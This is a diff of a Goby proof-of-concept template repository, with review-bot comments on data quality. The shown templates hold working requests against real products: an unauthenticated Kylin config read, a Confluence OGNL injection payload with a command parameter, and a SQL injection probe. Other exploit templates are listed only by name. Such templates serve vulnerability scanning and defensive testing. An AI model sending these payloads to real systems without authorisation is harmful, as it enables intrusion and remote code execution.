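- "Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.",
- "Recommendation": "update",
+ "Author": "PeiQi",
+ "Impact": "<p>Attackers can use this vulnerability to obtain sensitive information of the system.<br></p>",
+ "Recommandation": "<p>Upgrade to the safe version, or perform the following mitigation measures:</p><p>Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \";</p><p>Delete the following line \"&lt; scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/&gt;\";</p><p>Restart the kylin instance to take effect.</p>",
  "References": [
- "https://nvd.nist.gov/vuln/detail/CVE-2020-13937"
+ "http://wiki.peiqi.tech"
  ],
- "HasExp": true,
- "ExpParams": [
- {
- "Name": "Config",
- "Type": "select",
- "Value": "/kylin/api/admin/config"
- }
- ],
- "ExpTips": {
- "Type": "",
- "Content": ""
- },
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Config",
+ "type": "select",
+ "value": "/kylin/api/admin/config",
+ "show": ""
+ }
+ ],
  "ScanSteps": [
  "AND",
  {
@@ -33,7 +30,7 @@
  "method": "GET",
  "uri": "/kylin/api/admin/config",
  "follow_redirect": true,
- "header": null,
+ "header": {},
  "data_type": "text",
  "data": ""
  },
@@ -60,18 +57,18 @@
  "SetVariable": []
  }
  ],
- "ExploitSteps": [
+ "ExploitSteps": [
  "AND",
  {
  "Request": {
  "method": "GET",
  "uri": "/kylin/api/admin/config",
  "follow_redirect": true,
- "header": null,
+ "header": {},
  "data_type": "text",
  "data": ""
  },
- "ResponseTest": {
+ "ResponseTest": {
  "type": "group",
  "operation": "AND",
  "checks": [
@@ -92,10 +89,10 @@
  ]
  },
  "SetVariable": [
- "output|lastbody|undefined|undefined"
- ]
+ "output|lastbody"
+ ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-04-04 15:55:28",
+ "GobyVersion": "1.8.255"
 }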
  • lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_ShenYu_Admin_Unauth_Access_CVE_2022_23944.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Solr_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Solr_Log4j2CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Solr_RemoteStreaming_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Struts2_S2_053_RCE_CVE_2017_12611.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Struts2_S2_059_RCE_CVE_2019_0230.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Apache_Struts2_S2_062_RCE_CVE_2021_31805.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/AspCMS_commentList.asp_SQLinjection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
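--- a/lib/goby/goby_pocs/Aspcms_Backend_Leak.json
+++ b/lib/goby/goby_pocs/Aspcms_Backend_Leak.json
@@ -5,11 +5,11 @@
  "infoleak"
  ],
  "GobyQuery": "app=\"ASPCMS\"",
- "Description": "aspCMS is a module based ASP Content Management System (CMS).",
+ "Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url",
  "Product": "ASPCMS",
- "Homepage": "",
- "Author": "",
- "Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.",
+ "Homepage": "https://gobies.org/",
+ "Author": "aetkrad",
+ "Impact": "<p>leak backend url<br></p>",
  "Recommendation": "",
  "References": [],
  "HasExp": true,
@@ -126,6 +126,6 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-02 20:50:45",
+ "GobyVersion": "1.8.302"
 }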
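Review bot: The new `Impact` value stores HTML (`<p>leak backend url<br></p>`) where the old value was a plain sentence, so any report writer that prints this field now has to escape or sanitize it before rendering; keeping the plain form, `"Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url."`, avoids that. `"Homepage": "https://gobies.org/"` does not look like the ASPCMS product site, so I would leave the field empty as before rather than point at an unrelated host. `Recommendation` stays empty, which leaves a finding from this template without remediation text. The same HTML-in-`Impact` change appears in the Cacti_Weathermap_File_Write.json and Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json sections.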
  • lib/goby/goby_pocs/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Atlassian_Confluence_OGNL_Injection_RCE_CVE_2022_26134.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
    lib/goby/goby_pocs/Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    1 1  {
    2  - "Name": "Atlassian Confluence OGNL Injection CVE-2021-26084",
     2 + "Name": "Atlassian Confluence OGNL injection CVE-2021-26084",
    3 3   "Level": "3",
    4 4   "Tags": [
    5  - "sqli"
     5 + "rce"
    6 6   ],
    7  - "GobyQuery": "app=\"Confluence\" || product=\"Confluence\" || company=\"Atlassian\"",
    8  - "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.",
     7 + "GobyQuery": "app=\"Confluence\"",
     8 + "Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.",
    9 9   "Product": "Atlassian Confluence",
    10 10   "Homepage": "https://www.atlassian.com",
    11  - "Author": "",
    12  - "Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
    13  - "Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
     11 + "Author": "luckying1314@139.com",
     12 + "Impact": "<p>An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.<br></p>",
     13 + "Recommendation": "<p>General repair suggestions:</p><p>Check and upgrade to the secure version based on the information in the affected version. The official download link is :<a href>https://www.atlassian.com/software/confluence/download-archives</a></p><p>Temporary repair suggestions:</p><p>If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.:<a href>https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html</a></p>",
    14 14   "References": [
    15  - "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
    16  - "https://jira.atlassian.com/browse/CONFSERVER-67940",
    17  - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html"
     15 + "https://github.com/alt3kx/CVE-2021-26084_PoC"
    18 16   ],
    19 17   "HasExp": true,
    20 18   "ExpParams": [
    21 19   {
    22  - "Name": "Command",
     20 + "Name": "command",
    23 21   "Type": "input",
    24 22   "Value": "whoami"
    25  - },
    26  - {
    27  - "Name": "Path",
    28  - "Type": "select",
    29  - "Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features"
    30 23   }
    31 24   ],
    32 25   "ExpTips": {
    skipped 1 lines
    34 27   "Content": ""
    35 28   },
    36 29   "ScanSteps": [
    37  - "OR",
     30 + "AND",
    38 31   {
    39 32   "Request": {
    40 33   "method": "POST",
    skipped 3 lines
    44 37   "Content-Type": "application/x-www-form-urlencoded"
    45 38   },
    46 39   "data_type": "text",
    47  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    48  - "set_variable": []
    49  - },
    50  - "ResponseTest": {
    51  - "type": "group",
    52  - "operation": "AND",
    53  - "checks": [
    54  - {
    55  - "type": "item",
    56  - "variable": "$code",
    57  - "operation": "==",
    58  - "value": "200",
    59  - "bz": ""
    60  - },
    61  - {
    62  - "type": "item",
    63  - "variable": "$body",
    64  - "operation": "contains",
    65  - "value": "value=\"aaaa{140592=null}",
    66  - "bz": ""
    67  - }
    68  - ]
    69  - },
    70  - "SetVariable": []
    71  - },
    72  - {
    73  - "Request": {
    74  - "method": "POST",
    75  - "uri": "/pages/createpage-entervariables.action",
    76  - "follow_redirect": true,
    77  - "header": {
    78  - "Content-Type": "application/x-www-form-urlencoded"
    79  - },
    80  - "data_type": "text",
    81  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    82  - "set_variable": []
    83  - },
    84  - "ResponseTest": {
    85  - "type": "group",
    86  - "operation": "AND",
    87  - "checks": [
    88  - {
    89  - "type": "item",
    90  - "variable": "$code",
    91  - "operation": "==",
    92  - "value": "200",
    93  - "bz": ""
    94  - },
    95  - {
    96  - "type": "item",
    97  - "variable": "$body",
    98  - "operation": "contains",
    99  - "value": "value=\"aaaa{140592=null}",
    100  - "bz": ""
    101  - }
     40 + "data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027",
     41 + "set_variable": [
     42 + "r1|rand|int|8",
     43 + "r2|rand|int|7",
     44 + "r4|r1|add|r2"
    102 45   ]
    103 46   },
    104  - "SetVariable": []
    105  - },
    106  - {
    107  - "Request": {
    108  - "method": "POST",
    109  - "uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x",
    110  - "follow_redirect": true,
    111  - "header": {
    112  - "Content-Type": "application/x-www-form-urlencoded"
    113  - },
    114  - "data_type": "text",
    115  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    116  - "set_variable": []
    117  - },
    118 47   "ResponseTest": {
    119 48   "type": "group",
    120 49   "operation": "AND",
    skipped 9 lines
    130 59   "type": "item",
    131 60   "variable": "$body",
    132 61   "operation": "contains",
    133  - "value": "value=\"aaaa{140592=null}",
     62 + "value": "{{{r4}}}",
    134 63   "bz": ""
    135 64   }
    136 65   ]
    137 66   },
    138  - "SetVariable": []
    139  - },
    140  - {
    141  - "Request": {
    142  - "method": "POST",
    143  - "uri": "/confluence/pages/createpage-entervariables.action",
    144  - "follow_redirect": true,
    145  - "header": {
    146  - "Content-Type": "application/x-www-form-urlencoded"
    147  - },
    148  - "data_type": "text",
    149  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    150  - "set_variable": []
    151  - },
    152  - "ResponseTest": {
    153  - "type": "group",
    154  - "operation": "AND",
    155  - "checks": [
    156  - {
    157  - "type": "item",
    158  - "variable": "$code",
    159  - "operation": "==",
    160  - "value": "200",
    161  - "bz": ""
    162  - },
    163  - {
    164  - "type": "item",
    165  - "variable": "$body",
    166  - "operation": "contains",
    167  - "value": "value=\"aaaa{140592=null}",
    168  - "bz": ""
    169  - }
    170  - ]
    171  - },
    172  - "SetVariable": []
    173  - },
    174  - {
    175  - "Request": {
    176  - "method": "POST",
    177  - "uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x",
    178  - "follow_redirect": true,
    179  - "header": {
    180  - "Content-Type": "application/x-www-form-urlencoded"
    181  - },
    182  - "data_type": "text",
    183  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    184  - "set_variable": []
    185  - },
    186  - "ResponseTest": {
    187  - "type": "group",
    188  - "operation": "AND",
    189  - "checks": [
    190  - {
    191  - "type": "item",
    192  - "variable": "$code",
    193  - "operation": "==",
    194  - "value": "200",
    195  - "bz": ""
    196  - },
    197  - {
    198  - "type": "item",
    199  - "variable": "$body",
    200  - "operation": "contains",
    201  - "value": "value=\"aaaa{140592=null}",
    202  - "bz": ""
    203  - }
    204  - ]
    205  - },
    206  - "SetVariable": []
    207  - },
    208  - {
    209  - "Request": {
    210  - "method": "POST",
    211  - "uri": "/wiki/pages/createpage-entervariables.action",
    212  - "follow_redirect": true,
    213  - "header": {
    214  - "Content-Type": "application/x-www-form-urlencoded"
    215  - },
    216  - "data_type": "text",
    217  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    218  - "set_variable": []
    219  - },
    220  - "ResponseTest": {
    221  - "type": "group",
    222  - "operation": "AND",
    223  - "checks": [
    224  - {
    225  - "type": "item",
    226  - "variable": "$code",
    227  - "operation": "==",
    228  - "value": "200",
    229  - "bz": ""
    230  - },
    231  - {
    232  - "type": "item",
    233  - "variable": "$body",
    234  - "operation": "contains",
    235  - "value": "value=\"aaaa{140592=null}",
    236  - "bz": ""
    237  - }
    238  - ]
    239  - },
    240  - "SetVariable": []
    241  - },
    242  - {
    243  - "Request": {
    244  - "method": "POST",
    245  - "uri": "/pages/doenterpagevariables.action",
    246  - "follow_redirect": true,
    247  - "header": {
    248  - "Content-Type": "application/x-www-form-urlencoded"
    249  - },
    250  - "data_type": "text",
    251  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    252  - "set_variable": []
    253  - },
    254  - "ResponseTest": {
    255  - "type": "group",
    256  - "operation": "AND",
    257  - "checks": [
    258  - {
    259  - "type": "item",
    260  - "variable": "$code",
    261  - "operation": "==",
    262  - "value": "200",
    263  - "bz": ""
    264  - },
    265  - {
    266  - "type": "item",
    267  - "variable": "$body",
    268  - "operation": "contains",
    269  - "value": "value=\"aaaa{140592=null}",
    270  - "bz": ""
    271  - }
    272  - ]
    273  - },
    274  - "SetVariable": []
    275  - },
    276  - {
    277  - "Request": {
    278  - "method": "POST",
    279  - "uri": "/pages/createpage.action?spaceKey=myproj",
    280  - "follow_redirect": true,
    281  - "header": {
    282  - "Content-Type": "application/x-www-form-urlencoded"
    283  - },
    284  - "data_type": "text",
    285  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    286  - "set_variable": []
    287  - },
    288  - "ResponseTest": {
    289  - "type": "group",
    290  - "operation": "AND",
    291  - "checks": [
    292  - {
    293  - "type": "item",
    294  - "variable": "$code",
    295  - "operation": "==",
    296  - "value": "200",
    297  - "bz": ""
    298  - },
    299  - {
    300  - "type": "item",
    301  - "variable": "$body",
    302  - "operation": "contains",
    303  - "value": "value=\"aaaa{140592=null}",
    304  - "bz": ""
    305  - }
    306  - ]
    307  - },
    308  - "SetVariable": []
    309  - },
    310  - {
    311  - "Request": {
    312  - "method": "POST",
    313  - "uri": "/pages/templates2/viewpagetemplate.action",
    314  - "follow_redirect": true,
    315  - "header": {
    316  - "Content-Type": "application/x-www-form-urlencoded"
    317  - },
    318  - "data_type": "text",
    319  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    320  - "set_variable": []
    321  - },
    322  - "ResponseTest": {
    323  - "type": "group",
    324  - "operation": "AND",
    325  - "checks": [
    326  - {
    327  - "type": "item",
    328  - "variable": "$code",
    329  - "operation": "==",
    330  - "value": "200",
    331  - "bz": ""
    332  - },
    333  - {
    334  - "type": "item",
    335  - "variable": "$body",
    336  - "operation": "contains",
    337  - "value": "value=\"aaaa{140592=null}",
    338  - "bz": ""
    339  - }
    340  - ]
    341  - },
    342  - "SetVariable": []
    343  - },
    344  - {
    345  - "Request": {
    346  - "method": "POST",
    347  - "uri": "/pages/createpage-entervariables.action",
    348  - "follow_redirect": true,
    349  - "header": {
    350  - "Content-Type": "application/x-www-form-urlencoded"
    351  - },
    352  - "data_type": "text",
    353  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    354  - "set_variable": []
    355  - },
    356  - "ResponseTest": {
    357  - "type": "group",
    358  - "operation": "AND",
    359  - "checks": [
    360  - {
    361  - "type": "item",
    362  - "variable": "$code",
    363  - "operation": "==",
    364  - "value": "200",
    365  - "bz": ""
    366  - },
    367  - {
    368  - "type": "item",
    369  - "variable": "$body",
    370  - "operation": "contains",
    371  - "value": "value=\"aaaa{140592=null}",
    372  - "bz": ""
    373  - }
    374  - ]
    375  - },
    376  - "SetVariable": []
    377  - },
    378  - {
    379  - "Request": {
    380  - "method": "POST",
    381  - "uri": "/template/custom/content-editor",
    382  - "follow_redirect": true,
    383  - "header": {
    384  - "Content-Type": "application/x-www-form-urlencoded"
    385  - },
    386  - "data_type": "text",
    387  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    388  - "set_variable": []
    389  - },
    390  - "ResponseTest": {
    391  - "type": "group",
    392  - "operation": "AND",
    393  - "checks": [
    394  - {
    395  - "type": "item",
    396  - "variable": "$code",
    397  - "operation": "==",
    398  - "value": "200",
    399  - "bz": ""
    400  - },
    401  - {
    402  - "type": "item",
    403  - "variable": "$body",
    404  - "operation": "contains",
    405  - "value": "value=\"aaaa{140592=null}",
    406  - "bz": ""
    407  - }
    408  - ]
    409  - },
    410  - "SetVariable": []
    411  - },
    412  - {
    413  - "Request": {
    414  - "method": "POST",
    415  - "uri": "/templates/editor-preload-container",
    416  - "follow_redirect": true,
    417  - "header": {
    418  - "Content-Type": "application/x-www-form-urlencoded"
    419  - },
    420  - "data_type": "text",
    421  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    422  - "set_variable": []
    423  - },
    424  - "ResponseTest": {
    425  - "type": "group",
    426  - "operation": "AND",
    427  - "checks": [
    428  - {
    429  - "type": "item",
    430  - "variable": "$code",
    431  - "operation": "==",
    432  - "value": "200",
    433  - "bz": ""
    434  - },
    435  - {
    436  - "type": "item",
    437  - "variable": "$body",
    438  - "operation": "contains",
    439  - "value": "value=\"aaaa{140592=null}",
    440  - "bz": ""
    441  - }
    442  - ]
    443  - },
    444  - "SetVariable": []
    445  - },
    446  - {
    447  - "Request": {
    448  - "method": "POST",
    449  - "uri": "/users/user-dark-features",
    450  - "follow_redirect": true,
    451  - "header": {
    452  - "Content-Type": "application/x-www-form-urlencoded"
    453  - },
    454  - "data_type": "text",
    455  - "data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
    456  - "set_variable": []
    457  - },
    458  - "ResponseTest": {
    459  - "type": "group",
    460  - "operation": "AND",
    461  - "checks": [
    462  - {
    463  - "type": "item",
    464  - "variable": "$code",
    465  - "operation": "==",
    466  - "value": "200",
    467  - "bz": ""
    468  - },
    469  - {
    470  - "type": "item",
    471  - "variable": "$body",
    472  - "operation": "contains",
    473  - "value": "value=\"aaaa{140592=null}",
    474  - "bz": ""
    475  - }
    476  - ]
    477  - },
    478  - "SetVariable": []
     67 + "SetVariable": [
     68 + "output|lastbody|regex|"
     69 + ]
    479 70   }
    480 71   ],
    481 72   "ExploitSteps": [
    skipped 1 lines
    483 74   {
    484 75   "Request": {
    485 76   "method": "POST",
    486  - "uri": "{{{Path}}}",
     77 + "uri": "/pages/createpage-entervariables.action?SpaceKey=x",
    487 78   "follow_redirect": true,
    488 79   "header": {
    489 80   "Content-Type": "application/x-www-form-urlencoded"
    skipped 20 lines
    510 101   ]
    511 102   }
    512 103   ],
    513  - "PostTime": "0000-00-00 00:00:00",
    514  - "GobyVersion": "0.0.0"
     104 + "PostTime": "2021-09-03 11:27:04",
     105 + "GobyVersion": "1.8.300"
    515 106  }
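Review bot: `ScanSteps` goes from an `OR` over thirteen request blocks to a single request under `AND`, and the `Path` parameter is removed, so instances served under a `/confluence` or `/wiki` context path are presumably no longer probed and would be reported clean while still unpatched (the URI of the remaining request sits in a collapsed part of this section, so this should be confirmed). I would keep `"OR"` with at least the context-path variants. The new `Impact` text also drops the affected-version ranges, and `References` replaces the NVD and vendor entries with one third-party repository; keeping `"https://nvd.nist.gov/vuln/detail/CVE-2021-26084"` and `"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html"` gives whoever triages the finding an authoritative source. The `<a href>` tags in `Recommendation` carry no attribute value, so the links will not work wherever this field is rendered as HTML.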
  • lib/goby/goby_pocs/Atlassian_Jira_Path_Traversal_CVE_2021_26086.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Atlassian_Jira_Seraph_Authentication_bypass_CVE_2022_0540.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure_CVE_2020_14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/BSPHP_index.php_unauthorized_access_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/BigAnt_Server_v5.6.06_Path_Traversal_CVE_2022_23347.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CVE_2018_19367_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/CVE_2022_22947.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
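--- a/lib/goby/goby_pocs/Cacti_Weathermap_File_Write.json
+++ b/lib/goby/goby_pocs/Cacti_Weathermap_File_Write.json
@@ -4,12 +4,12 @@
  "Tags": [
  "getshell"
  ],
- "GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"",
- "Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.",
- "Product": "cacti",
+ "GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")",
+ "Description": "allows remote attackers to upload and execute arbitrary files",
+ "Product": "cacti-",
  "Homepage": "https://www.cacti.net/",
- "Author": "",
- "Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
+ "Author": "aetkrad",
+ "Impact": "<p>Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.<br></p>",
  "Recommendation": "",
  "References": [],
  "HasExp": true,
@@ -121,6 +121,6 @@
  ]
  }
  ],
- "PostTime": "0000-00-00 00:00:00",
- "GobyVersion": "0.0.0"
+ "PostTime": "2021-11-05 13:30:24",
+ "GobyVersion": "1.8.302"
 }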
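Review bot: `"Product": "cacti-"` looks like a truncation of the `cacti-监控系统` app name used in `GobyQuery`; the previous `"Product": "cacti"` is the cleaner label and is presumably what reports group findings under. The query also switches from `||` to a parenthesised single `|`; if the template loader in this repository understands only one of the two forms, the template will silently never match, so this is worth confirming against the parser (the ClickHouse_SQLI.json section makes the same switch). `Description` now states the flaw without naming the affected component, and `Recommendation` is still empty for a template tagged `getshell`, so a hit gives the defender nothing to act on.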
  • lib/goby/goby_pocs/Casdoor_1.13.0_SQL_InjectionCVE_2022_24124.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■ ■
    lib/goby/goby_pocs/Cerebro_request_SSRF.json
     1 +{
     2 + "Name": "fumengyun AjaxMethod.ashx SQL injection",
     3 + "Level": "3",
     4 + "Tags": [
     5 + "sqli"
     6 + ],
     7 + "GobyQuery": "title=\"孚盟云\"",
     8 + "Description": "",
     9 + "Product": "",
     10 + "Homepage": "https://gobies.org/",
     11 + "Author": "[email protected]",
     12 + "Impact": "",
     13 + "Recommendation": "",
     14 + "References": [
     15 + "https://gobies.org/"
     16 + ],
     17 + "HasExp": true,
     18 + "ExpParams": null,
     19 + "ExpTips": {
     20 + "Type": "",
     21 + "Content": ""
     22 + },
     23 + "ScanSteps": [
     24 + "AND",
     25 + {
     26 + "Request": {
     27 + "method": "GET",
     28 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
     29 + "follow_redirect": true,
     30 + "header": null,
     31 + "data_type": "text",
     32 + "data": "",
     33 + "set_variable": []
     34 + },
     35 + "ResponseTest": {
     36 + "type": "group",
     37 + "operation": "AND",
     38 + "checks": [
     39 + {
     40 + "type": "item",
     41 + "variable": "$code",
     42 + "operation": "==",
     43 + "value": "500",
     44 + "bz": ""
     45 + },
     46 + {
     47 + "type": "item",
     48 + "variable": "$body",
     49 + "operation": "contains",
     50 + "value": "SELECT",
     51 + "bz": ""
     52 + }
     53 + ]
     54 + },
     55 + "SetVariable": [
     56 + "output|lastbody|regex|"
     57 + ]
     58 + }
     59 + ],
     60 + "ExploitSteps": [
     61 + "AND",
     62 + {
     63 + "Request": {
     64 + "method": "GET",
     65 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
     66 + "follow_redirect": true,
     67 + "header": null,
     68 + "data_type": "text",
     69 + "data": "",
     70 + "set_variable": []
     71 + },
     72 + "ResponseTest": {
     73 + "type": "group",
     74 + "operation": "AND",
     75 + "checks": [
     76 + {
     77 + "type": "item",
     78 + "variable": "$code",
     79 + "operation": "==",
     80 + "value": "500",
     81 + "bz": ""
     82 + },
     83 + {
     84 + "type": "item",
     85 + "variable": "$body",
     86 + "operation": "contains",
     87 + "value": "SELECT",
     88 + "bz": ""
     89 + }
     90 + ]
     91 + },
     92 + "SetVariable": [
     93 + "output|lastbody|regex|"
     94 + ]
     95 + }
     96 + ],
     97 + "PostTime": "2022-07-02 21:53:57",
     98 + "GobyVersion": "1.9.323"
     99 +}
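Review bot: The file is named Cerebro_request_SSRF.json but its content is a different template: `"Name": "fumengyun AjaxMethod.ashx SQL injection"`, tag `sqli`, and `"GobyQuery": "title=\"孚盟云\""`. As committed, no Cerebro check is added, and anyone triaging results by file name will misread what ran against a host; either rename the file to match the template or replace the body with the intended Cerebro template. `Description`, `Product`, `Impact` and `Recommendation` are all empty, so a hit carries no context or remediation. `ExploitSteps` repeats `ScanSteps` verbatim while `HasExp` is `true`; `"HasExp": false` would describe the template more accurately.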
  • lib/goby/goby_pocs/Chanjet_CRM_get_usedspace.php_sql_injection_CNVD_2021_12845.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/China_Mobile_Yu_Routing_ExportSettings.sh_Info_Leak_CNVD_2020_67110.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/China_Mobile_Yu_Routing_Login_Bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/China_Mobile_Yu_routed_the_login_bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Citrix_Unauthorized_CVE_2020_8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • lib/goby/goby_pocs/Citrix_unauthenticated_LFI_CVE-2020-8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644
    Content is identical
  • ■ ■ ■ ■ ■
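--- a/lib/goby/goby_pocs/ClickHouse_SQLI.json
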